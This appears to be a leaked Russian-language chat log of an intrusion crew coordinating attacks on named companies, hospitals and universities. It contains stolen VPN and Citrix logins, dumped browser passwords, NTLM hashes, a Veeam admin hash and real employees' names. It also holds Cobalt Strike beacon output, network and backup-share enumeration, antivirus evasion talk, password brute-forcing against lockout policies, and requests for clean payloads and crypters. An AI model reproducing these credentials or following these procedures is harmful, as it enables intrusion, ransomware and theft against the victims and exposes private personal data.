``Не подключиться с кредами на ASPSQL2.mapciasp.com, через wmic не посмоть дериктории. Удалось запустить под кредами poewershell. От aspsql2svc пробовал запускать нагрузку, ничего.да?Это pwd: map#2013:thumbsup:будем разбирать новый инструмент и метод[ ](https://mediaeveryone.com/channel/general?msg=32qzfSYtweTWNgzoD) ?всем придется читать и вникатьпо крайней мере будет обновление процесадавсе будем?можете заканчивать с текущими задачами и плавно переходим к #sisd-netнеав птш нет возможности запускать файлы шарповские из памяти?я вам собираю под х64 дл+все собираете с чеком?давай файлик шелкодаДелки палятьсянеадавайа кобальта нового нет?был самый чистый из последнихllvm могу собратьКриптор чистый есть?через полчаса будет собрание и все обсудимначнем закрыватьчерез час[ ](https://mediaeveryone.com/channel/general?msg=DQgoiuMG8xsQZaxZo) чето молчит деп(ок, сейчас попробуюsql management студия?скорее всего будем брать в 3-4 кобыу депа соберите себе нагрузки чистые на каждую личную кобуготов билдче с билдом?[ ](https://mediaeveryone.com/channel/general?msg=poH4tpKdX3YgrcJoR) взял[ ](https://mediaeveryone.com/channel/general?msg=myX45efB6jTFRGsgG) ```
https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169!!
```
@user7``
https://cloudgw.cpcc.edu/vpn/index.html sperez14 Lisbeth1219
```
@user3проверь, она у тебя в работе была``
https://vlab.unf.edu/vpn/index.html n00647072 fLORIDAHISTORY2074!
```
@user8 еще доступыесть замена ?@tl1 есть еще че?Your credentials are invalid. Try again or contact your system administrator.
https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx md.raws 1984Bears
```
@user3 заменаугу, значит чисто``
Cannot find path 'C:\Users\Healdton.IT\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine' because it does not exist.
``да, донастраиваю компесли после выполнения команды выше получили ошибку, можно проверить стандартный путь ручками
```
dir $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine
```т е ты щас без работы сидишь?И еще раз, я тебе отписывался по каждой из двух которые ты давал. По одной в конфе по второй в общем. В одной даные залочили, во второй нет возможности запустить cmd``
Get-PSReadLineOption
```
последний раз скидываю, запишите ужетут доступы сдохли и сеть умерла?``
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx
```
у меня на тебя открыта эта сетьты писал в #general или в конфу?окПереустановкой OS на компе. Облять вырубился и не видел разделыв #general?так чем ты занят был?Я тебе по каждой отписывался!``
https://paloca.cernerworks.com/citrix/prodweb/
``````
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx
``````
https://paloca.cernerworks.com/citrix/prodweb/
``вчера с каждым по сеткам проходили, что у кого в работе[ ](https://mediaeveryone.com/channel/general?msg=KkJ6tAjTNcYQip8Q5) Какие?[ ](https://mediaeveryone.com/channel/general?msg=7q8mQHmN7r28bkXnh) что значит вчера пропустил?все умерли?ты чем вобще занят? у меня на тебя 2 сетки записаносоздаля тебя вчера пропустил?естьМужик ты прикалываешься? Я тебе вчера написал что залочины даныепотом создамсначала ад сними толькодаможно конфу[ ](https://mediaeveryone.com/channel/general?msg=ovxt4rPWrkyc7Tmzt) работайты отписал норм, у тебя пошел прогресс по сетке или что?в трете посмотривсё есть сессия домен `stg-healthcare.com`От куда?@tl1 На какой?@user3 еще мне ответил на вопрося понялокей[ ](https://mediaeveryone.com/channel/general?msg=g8Qfkuof4BoNauGRY) спросить про нагрузкуну как по мне если думать дальше логически от твоего предложенияпро нагрузку откуда мне знатьможет подсказатьок он работает с тпш>по всем вопросам работы к stalinя тебя отсылал к @user3 что он давно с ним работаетда и вы в одном местев этой конфе уже встречалась инфа об этомне вообще откуда знать, что то ещё в тпш мне выжеть нагрузку?[ ](https://mediaeveryone.com/channel/general?msg=hPxT9hsQA8o3dFvqP) я уже ответилв #general все сидяту 2х человек помимо меня был доступ тудавас 5 человек в одном месте[ ](https://mediaeveryone.com/channel/general?msg=5mapbAMAwqNMc4RMF) м?и ничего не получилесли я отписывал об этом еще вчераи я вижу что ты выбрали ждать 4 часавыбор спросить у коллегв кобу притянул или ла/да получил?у меня был выбор?норм в чем?4 часа просто сидел?я её ещё вчера ждал@user8 чем занят был последние 4 часа? ждал нагрузку?да тут мыникто не смог 2 кнопки нажать и нагрузку коллеге выдать?я и @user8 ?сколько человек в команде?Что точней?>мне нужна команда для спавна в тпш для сетки tcph.stg-healthcare.com[ ](https://mediaeveryone.com/channel/general?msg=aeofhWmcgAmQw4Ah2) то есть команду в тпш можно?[ ](https://mediaeveryone.com/channel/general?msg=pGT2JSTaectAeK8Mm) а точнее?у меня то же и писал в чате
роут пытаюсь сделать,чтобы не умирал, portfwd не хочет работатьНормили билд ужеа че команду на тпш можно?как у вас дела?:v:не за чтоспасибоZe8ZW53FztpsVFTюзер3а пароль не помнитсвой - какой?свой, он систему переставилон логин какой вводит?@tl1 сталин в рокете не может авторизоваться, скиньте парольбудет сегоднябилд будет?а рокет лежалну и не мог в любом случае зайти по рдп, тк доступ в рокете лежитдля тпшлично я командуожидаем чего?ожиданием, получается
мне нужна команда для спавна в тпш для сетки `tcph.stg-healthcare.com`чем сейчас заняты?hiвсем приветнет, у нас тожепривет, у меня одного лежал рокет?тут. привету?спались кажетсяпинганул сначала с ДК, потом с тачки админа, везде 100% лосс друго сегмента сети видно?ок, тогда его пропущу, посмотрю что на других адресахполучатеся даотрубили?``
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 02:36:56> shell ping 192.168.100.247 -n 1
[*] Tasked beacon to run: ping 192.168.100.247 -n 1
[+] host called home, sent: 68 bytes
[+] received output:
Pinging 192.168.100.247 with 32 bytes of data:
Request timed out.
Ping statistics for 192.168.100.247:
Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
```
понятно (даже не дает зайти``
The connection has timed out
The server at 192.168.100.247 is taking too long to respond.
The site could be temporarily unavailable or too busy. Try again in a few moments.
If you are unable to load any pages, check your computer's network connection.
If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.
```172.93.105.2:18541дай сокси с дк под токено и с тачки владельцадиски видны снаружи?а сокс с тачки владельца?такая же хреньсейчас попробую с другой проксис другого места кидали?дргугие сылки то открываеттак прокся отпала не?в консоли пустоскинешь что тамвкладка консоль и нетворкоткрой отладчик в браузерефреш?и страница грузитсяна секунду показывает что зашло и потом белый экрана вырубает то что?прокся не падаетпрокся падает?и долго грузитсятолько нажимаю войти как сразу вырубает[ ](https://mediaeveryone.com/group/waterway-com?msg=wqSewELvNyiwWnvd2) неачто внутри?что интересноетак`http://192.168.100.247/AXIS_ACCC8ECFBF99,http://192.168.100.247/,11/22/2019 1:44:27 PM,13218925467505127,root,Waterway99!`@tl1 @tl2`WATERWAY\mharper LoveUnit14*`ещё не закончили, сейчас всё перепроверим что с браузеров поснимали и двинем дальше`MACMINI-EDC269`имя хоста какое? не тайммашин случаем[ ](https://mediaeveryone.com/group/waterway-com?msg=7TsNZAcfpHzmPd98t) внц порт открытеще не закончили?`192.168.6.160\posserver01\PPXMLData L00k4MyD@ta`Carbonite BackupMac
```
192.168.0.233:5900
192.168.0.233:3283
192.168.0.233:88
192.168.0.233:22 (SSH-2.0-OpenSSH_8.1)
192.168.0.233:445
````\WWSQL\S$\SQLBackup``\WW2K1\F$\Data\AKPRO_Data\BACKUPS``\WW2K1\F$\Backup``\WW2K1\Data\AKPRO_Data\BACKUPS````
````\\REPORTING\D$\SQLBackup`мб
я помню только что тут 2 есхи былосолар бэкапит куда то в вг?что солар?мб солар?збсно востановили там сеть чуть не в один кликребята которые делали пропустили чето очеьн важное, я сам не в курсе до конца что именноага
там был фул ресторБля... ЛОЛ@tl1 @tl2``
C:\Program Files\N-able Technologies\AVDefender\WscRemediation.exe
C:\Program Files\N-able Technologies\AVDefender\EPProtectedService.exe
``У них тут bitdefender``
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://designcloud.mockflow.com/,https://designcloud.mockflow.com/,1/19/2017 12:11:15 PM,13129323075436512,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.microsoftonline.com/,https://login.microsoftonline.com/common/oauth2/authorize,1/20/2017 8:36:53 AM,13129396613038827,gkeller@waterway.com,W
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://accounts.google.com/,https://accounts.google.com/ServiceLogin,2/16/2017 2:48:17 PM,13131751697642844,waterwaytesting@gmail.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.hotschedules.com/,https://www.hotschedules.com/hs/login.jsp,2/28/2017 2:01:56 PM,13132785716990422,2120689,1534603
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://developer.authorize.net/,https://developer.authorize.net/hello_world/sandbox/,2/28/2017 3:31:08 PM,13132791068764829,gkeller727,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:20 AM,13134500840455937,admin,1Vanilla2
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:37 AM,13134500857385618,Admin,1Vanilla2
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.showmecables.com/,https://www.showmecables.com/customer/account/login/,4/17/2017 11:16:04 AM,13136919364519382,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/AuthenticationCT2/LoginAuthentication.aspx,1/20/2017 2:44:21 PM,13129418661810114,,12344321
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://securetest.i9.talx.com/,https://securetest.i9.talx.com/I9ExpressCT2/PostAuthenticated/EmployerReview.ascx,8/28/2017 1:23:59 PM,13148418239868206,,12344321
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/AuthenticationCT2/LoginAuthentication.aspx,1/20/2017 2:44:21 PM,13129418661810114,,12344321
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login5.silverpop.com/,https://login5.silverpop.com/login,1/27/2017 10:17:28 AM,13130007448689450,transact@waterway.com,Waterway!999
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://developer.authorize.net/,https://developer.authorize.net/hello_world/sandbox/,2/28/2017 3:31:08 PM,13132791068764829,gkeller727,GKoct2020!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://sandbox.authorize.net/,https://sandbox.authorize.net/UI/themes/anet/logon.aspx,3/3/2017 1:32:50 PM,13133043170642560,gkeller727,GKoct2020!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway.pingboard.com/,https://waterway.pingboard.com/invitation/accept,1/22/2018 2:49:00 PM,13161127740422083,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.authorize.net/,https://login.authorize.net/,7/21/2018 8:03:37 AM,13176651817834997,gkeller727,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://id.atlassian.com/,https://id.atlassian.com/signup/invite,11/15/2017 9:45:06 AM,13155234306572101,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://sso-prod.insite360.gilbarco.com/,https://sso-prod.insite360.gilbarco.com/auth/realms/people/login-actions/authenticate,1/19/2017 9:11:07 AM,13129312267171112,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://invitations.microsoft.com/,https://invitations.microsoft.com/signup,9/24/2018 1:18:57 PM,13182286737852274,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://pdiconnections.force.com/,https://pdiconnections.force.com/pdiconnections/Login,8/4/2017 8:50:19 AM,13146328219423516,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://pdiprodweb/,http://pdiprodweb/FocalPoint/Login.aspx,1/26/2018 9:18:55 AM,13161453535823207,waterway\gkeller,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://itprograms/,http://itprograms/pro_users/login,1/18/2017 6:03:47 PM,13129257827373174,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://github.com/,https://github.com/session,1/18/2017 6:28:21 PM,13129259301326003,gkellerww,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://smartscan.controlscan.com/,https://smartscan.controlscan.com/security/index/0/overview,1/3/2019 2:56:52 PM,13191022612362998,650000010503764,u7i2jwPWZdfCwcU
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://auth.monday.com/,https://auth.monday.com/users/invitation/accept,12/31/1600 6:00:00 PM,0,Greg Keller,kJHA2x9qfXmFM6U
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterwaytraining.litmos.com/,https://waterwaytraining.litmos.com/account/Login,2/25/2019 3:37:37 PM,13195604257652268,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway.zendesk.com/,https://waterway.zendesk.com/auth/v2/login/email_verification,3/30/2019 8:15:40 AM,13198425340398832,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://atlas.technologypartners.net/,https://atlas.technologypartners.net/jira/login.jsp,4/18/2019 10:08:50 AM,13200073730330373,mharper,.V)59n-UW4#Y{6bY
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://itprograms/,http://itprograms/,2/17/2017 11:09:05 AM,13131824945466325,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://ww5.autotask.net/,https://ww5.autotask.net/,9/11/2017 1:48:39 PM,13149629319827394,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://authentication.logmeininc.com/,https://authentication.logmeininc.com/,11/2/2017 10:23:35 AM,13154109815128559,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://accounts.zoho.com/,https://accounts.zoho.com/,7/5/2018 3:02:43 PM,13175294563791286,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://ntwkmtrpc/,http://ntwkmtrpc/,10/19/2017 11:09:13 AM,13152902953441972,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://wwsql01/,http://wwsql01/,1/8/2018 12:59:19 PM,13159911559498999,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.paycomonline.net/,https://www.paycomonline.net/,3/15/2018 11:38:53 AM,13165605533722509,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://mail.datotel.com/,https://mail.datotel.com/,5/23/2018 1:50:56 PM,13171575056275769,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.nationalcar.com/,https://www.nationalcar.com/,6/15/2017 10:55:12 AM,13142015712132139,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://gkeller.waterway.com:8080/,http://gkeller.waterway.com:8080/,10/24/2017 12:05:56 PM,13153338356438715,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://localhost:8080/,http://localhost:8080/,2/17/2017 11:39:28 AM,13131826768206820,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://sa.dor.mo.gov/,https://sa.dor.mo.gov/,3/7/2017 8:33:07 AM,131333707864092,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/,8/28/2017 11:22:05 AM,13148410925787355,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.opentable.com/,https://www.opentable.com/,2/7/2017 3:51:28 PM,13130977888943168,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,android://OrDksZTeY8ETlesJhBbFVR5KTnBdNkWQ5Rxr1jC3Ac3IfK3DjmDoQnD696F2RbgyDhHen6KuHKtDv3rv0LYZBA==@com.safetyculture.iauditor/,android://OrDksZTeY8ETlesJhBbFVR5KTnBdNkWQ5Rxr1jC3Ac3IfK3DjmDoQnD696F2RbgyDhHen6KuHKtDv3rv0LYZBA==@com.safetyculture.iauditor/,12/31/1600 6:00:00 PM,0,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,android://Jzj5T2E45Hb33D-lk-EHZVCrb7a064dEicTwrTYQYGXO99JqE2YERhbMP1qLogwJiy87OsBzC09Gk094Z-U_hg==@com.netflix.mediaclient/,android://Jzj5T2E45Hb33D-lk-EHZVCrb7a064dEicTwrTYQYGXO99JqE2YERhbMP1qLogwJiy87OsBzC09Gk094Z-U_hg==@com.netflix.mediaclient/,12/31/1600 6:00:00 PM,0,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway1578930554.zendesk.com/,https://waterway1578930554.zendesk.com/auth/v2/login/signin,1/15/2020 10:05:51 AM,13223577951113149,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://app.hotschedules.com/,https://app.hotschedules.com/hs/login.jsp,3/2/2020 12:41:12 PM,13227648072628460,2120689,1534603
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.coach.com/,https://www.coach.com/,4/28/2020 1:34:44 PM,13232572484452463,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://localhost:3000/,http://localhost:3000/,4/29/2020 12:31:19 PM,13232655079442330,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://wwng-stage-ui.azurewebsites.net/,https://wwng-stage-ui.azurewebsites.net/,5/4/2020 12:29:24 PM,13233086964594837,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://onenote.officeapps.live.com/,https://onenote.officeapps.live.com/,5/26/2020 1:35:43 PM,13234991743323159,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,android://sYsSllycB0V7gxpC4P7xYw9xD8SF41a-b_d5oxxl-E8RHZ9FH7IRXMMMfWPlrkMWPfdYSHz8fzvC0NguZ54U8w==@com.robinhood.android/,android://sYsSllycB0V7gxpC4P7xYw9xD8SF41a-b_d5oxxl-E8RHZ9FH7IRXMMMfWPlrkMWPfdYSHz8fzvC0NguZ54U8w==@com.robinhood.android/,12/31/1600 6:00:00 PM,0,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterwaycarwash.monday.com/,https://waterwaycarwash.monday.com/,9/28/2020 2:16:42 PM,13245794202143373,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.facebook.com/,https://www.facebook.com/,9/28/2020 4:47:40 PM,13245803260898448,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://lastpass.com/,https://lastpass.com/,10/8/2020 8:47:08 AM,13246638428429684,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.mockflow.com/,https://www.mockflow.com/,11/9/2020 5:04:30 PM,13249436670654041,gkeller@waterway.com,Waterway99
````http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:37 AM,13134500857385618,Admin,1Vanilla2`[ ](https://mediaeveryone.com/group/waterway-com?msg=yrYtJKNMZe8Cs4fL4) нет, сейчас всё подготовим и можно закрывать``
--- Chromium Credential (User: gkeller) ---
URL : https://designcloud.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99
--- Chromium Credential (User: gkeller) ---
URL : https://login.microsoftonline.com/common/login
Username : gkeller@waterway.com
Password : W
--- Chromium Credential (User: gkeller) ---
URL : https://id.atlassian.com/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : http://pdiprodweb/FocalPoint/Login.aspx
Username : waterway\gkeller
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://github.com/session
Username : gkellerww
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://smartscan.controlscan.com/security/login
Username : 65000001503764
Password : u7i2jwPWZdfCwcU
--- Chromium Credential (User: gkeller) ---
URL : https://waterway.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://waterway1578930554.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99
```у вас много тут дел осталось?`\\GKELLER\G$\WW2k1\IT\SolarwindsBackups``\GKELLER\G$\Backup`крч вот``
Teemo[PDIPRODWEB]SYSTEM */728|20Dec26 20:50:43> shell net view \\DRB2 /all
[Tasked beacon to run: net view \\DRB2 /all
[+] host called home, sent: 51 bytes
[+] received output:
Shared resources at \\DRB2
Share name Type Used as Comment
-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
Archive Disk
Backup Disk
C$ Disk Default share
E$ Disk Default share
Install Disk
IPC$ IPC Remote
Log Disk
MailMerge Disk
Media Disk
Replication Disk
SiteWatch Disk
The command completed successfully.
``````
\\DRB2\Archives
\\DRB2\Backup
\\DRB2\Replication
```
ещё бэкапы``
GKELLER.WATERWAY.COM
MIKEP16.WATERWAY.COM
BLAUERPC.WATERWAY.COM
U06NEWOFFICEPC.WATERWAY.COM
MHARPERNEW.WATERWAY.COM
``user3@tl1
добавь @user3 сюда пожайлуста`SYSTEM *@192.168.0.222 (WWDC2)`прилетело ?сейчас пасну ватервэйнееwaterway?я даже не успел проверить ДКне получится, она сдохлаrepdot.comдай пасс сессии мнеесли там записки нетвот этотfrancedc1и проверь дкага спскрасаучег, ок сейчас долочудолочишь остатки по рт?так вот надополтора тб забилитакие дела` 4405 File(s) 1,452,604,853,672 bytes
`хитер лис)как?АВ - битдэфендер
виам - veeam_admin a313f6cf5fb92a96195435f9a6e4b5a9
c гипервивером пока ещё разбираюсь
нашёл способ как прыгать по тачкам чтобы АВ не выёбывался (хз сильно паливно или нет)ав, виам и т дну мы поняли про бэкапы)ту у нас что?`\BLAUERPC\D$` бэкапыуже дело`bdredline.exe ` его пропустил``
[+] Determining what EDR products are installed on wwdc2...
[+] gzflt.sys Found
[+] 1 EDR Products Found!
======================
| Vendor Information |
----------------------
[+] BitDefender Found!
``если бы админ руками выпилил все сесси бы отватились из за домена в ЧСон мониторит активность и алертитне ав средство жетак мониторинг`Solarwinds` вроде мониторинга едрквери что сказалпоробовал прыгнуть на тачку и длку ав сожрал, хотя когда смотрел тасклист не замечал там чегото подобногоцэлых 7это я для себя, hv нашёлчто это?```
Shared resources at \\WWSQL2
My business server
Share name Type Used as Comment
-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
barcode Disk
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
Company Disk Company
E$ Disk Default share
F$ Disk Default share
File History Backups Disk
Folder Redirection Disk Folder Redirection
FTP Disk
G$ Disk Default share
IPC$ IPC Remote IPC
Shared Folders Disk
TrackIt Disk
Users Disk Users
``````
Server Name Remark
-------------------------------------------------------------------------------
\\ANDREWNEW
\\BLAUERPC BLauerPC
\\CATHYDESKTOP
\\CATHYNEW
\\CBUSERPC
\\CSTORENEW
\\DANIELLEMOYNE
\\DAVESOFFICEPC
\\DJARDEN
\\DJBROWNXPS
\\DRB2
\\GKELLER
\\HENERYSNEWPC
\\ITPROGRAMS
\\IWASH99
\\JAMIENEW
\\KANTRELLNEW
\\KEVINPC
\\LAB-OFFICE
\\LOYALTYTEST
\\LWINSTON
\\MACMINI-EDC269 Waterway's Mac mini
\\MARKETINGNEW
\\MELISSASNEWPC
\\MHARPERNEW
\\MIKEGNEWPC
\\MISSYSNEWPC
\\MORNINGREPORTPC
\\MUNGERPC
\\MWEISSDESKTOP
\MWITKOWSKINEW
\\NEWPCFORSOMEONE
\\NTWKMTRPC
\\PDIPRODSQL
\\PDIPRODWEB
\\RECRUITINGNEW
\\REPORTING
\\STEPHANIENEW
\\STEVENEW
\\TIFFANYSNEWPC
\\TRAININGPCSTL
\\TSHERIDANNEWPC
\\WW2K1
\\WWDC1
\\WWDC2
\\WWHV01
\\WWHV02
\\WWHV03
\\WWHV04
\\WWSQL
\\WWSQL2 My business server
```:frowning2:-``
Task SvcRestartTask#31841 2/4/2021 3:40:16 PM Ready
``Еще раз попробовал закреп уронить, проверь
```
CORP.TELEVISA.COM.MX 10.254.0.116 SYSTEM * CORPKLHLRSD01
```
tuxomibo.com до 3 уровня пингуется
kalarada.com до 3 не пингуется, только 1а, тогда есть смысл брутитьсегодня хэш нашела у тебя он изначально был?+живой?там вообще каша
доменных чекнул, там один только
```
* Username : ctxdbadmin
* Domain : CORP
* NTLM : 7106c947d3a8abbea16cb5448f4ac00a
```а потом в брут)проверь их доступы сначаланачни с доменныхесть и доменные и локальныеа там ЛА доменные пользаки?))))главное не путай password incorrect и access deniedда, в процессеи проверь на другие серверано возьми ЛА на серверах где можешь достатьстраннои он улетел в локаут?и он сразу в лок улетелнет, 1ты 19 раз пробовал?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=uRwtSbnezScksezfK) чекну``
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 120
Minimum password length: 12
Length of password history maintained: 6
Lockout threshold: 20
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: BACKUP
The command completed successfully.
```дай еще net accountsс их хешамила на серверах возьмида не трогай тогдаа, окейя не стал второй раз пробовать хэш, там видимо на него локаут стоит 1 попытка
опять залочуодновременноплюс чекнул бы этот хеш на тех кто в групе Servicio Basico и в групе Domain Admins``
Responsible: Jose Juan Muniz Mendoza. Person in charge 2: Adrián Ruíz Mondragon
```
я бы посмотрел кто эти двое, и если они важны чекнул бы на них хешхеш тоже не катит?так сесия то весит со старм паролемпользуйся моментом)даего включили?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=Xa5s9pour2AfZ9FoF) новых ла как грязи
Administrator практически везде разный* Username : ES050616C
* Domain : CORP
* NTLM : b7f8b9d8041930f6daed7cb3fb20c6d3
после того как я сунулся на дк))))
```
beacon> shell net user ES050616C /dom
[*] Tasked beacon to run: net user ES050616C /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain corp.televisa.com.mx.
User name ES050616C
Full Name Servicio ES050616C
Comment CORP - 4337626 - Alta 13/02/2019 - Responsible: Jose Juan Muniz Mendoza. Person in charge 2: Adrián Ruíz Mondragon
User's comment
Country/region code (null)
Account active Locked
Account expires Never
Password last set 2/4/2021 1:06:21 PM
Password expires 6/4/2021 1:06:21 PM
Password changeable 2/5/2021 1:06:21 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/27/2021 10:13:01 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Servicio Basico *Domain Users
*User_PSO *Domain Admins
The command completed successfully.
```
через 10 мин
```
beacon> shell net user ES050616C /dom
[*] Tasked beacon to run: net user ES050616C /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain corp.televisa.com.mx.
User name ES050616C
Full Name Servicio ES050616C
Comment CORP - 4337626 - Alta 13/02/2019 - Responsible: Jose Juan Muniz Mendoza. Person in charge 2: Adrián Ruíz Mondragon
User's comment
Country/region code (null)
Account active Yes
Account expires Never
Password last set 2/4/2021 1:23:14 PM
Password expires 6/4/2021 1:23:14 PM
Password changeable 2/5/2021 1:23:14 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/27/2021 10:13:01 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Servicio Basico *Domain Users
*User_PSO *Domain Admins
The command completed successfully.
``и net user по немупокажи пожалуйста какой там логин у этого ДА чей хеш была новых локальных админов?(и щас september1нету(аля august1вдруг там сезоный пассчекниклила нет, на cmd5 не проверяла клир7естьа хеш есть?вобщем есть пару тачек куда ходили ДА, надо их мониторитьчуть вылезли из пользовательского сегмента серверов
нашел сервер сессией ДА, но она там еще с августа висит и пароль уже давно поменян(тут без движений?``
CORP\aloar Televisa.2021
CORP\gadiazc Soyelnumero0000001
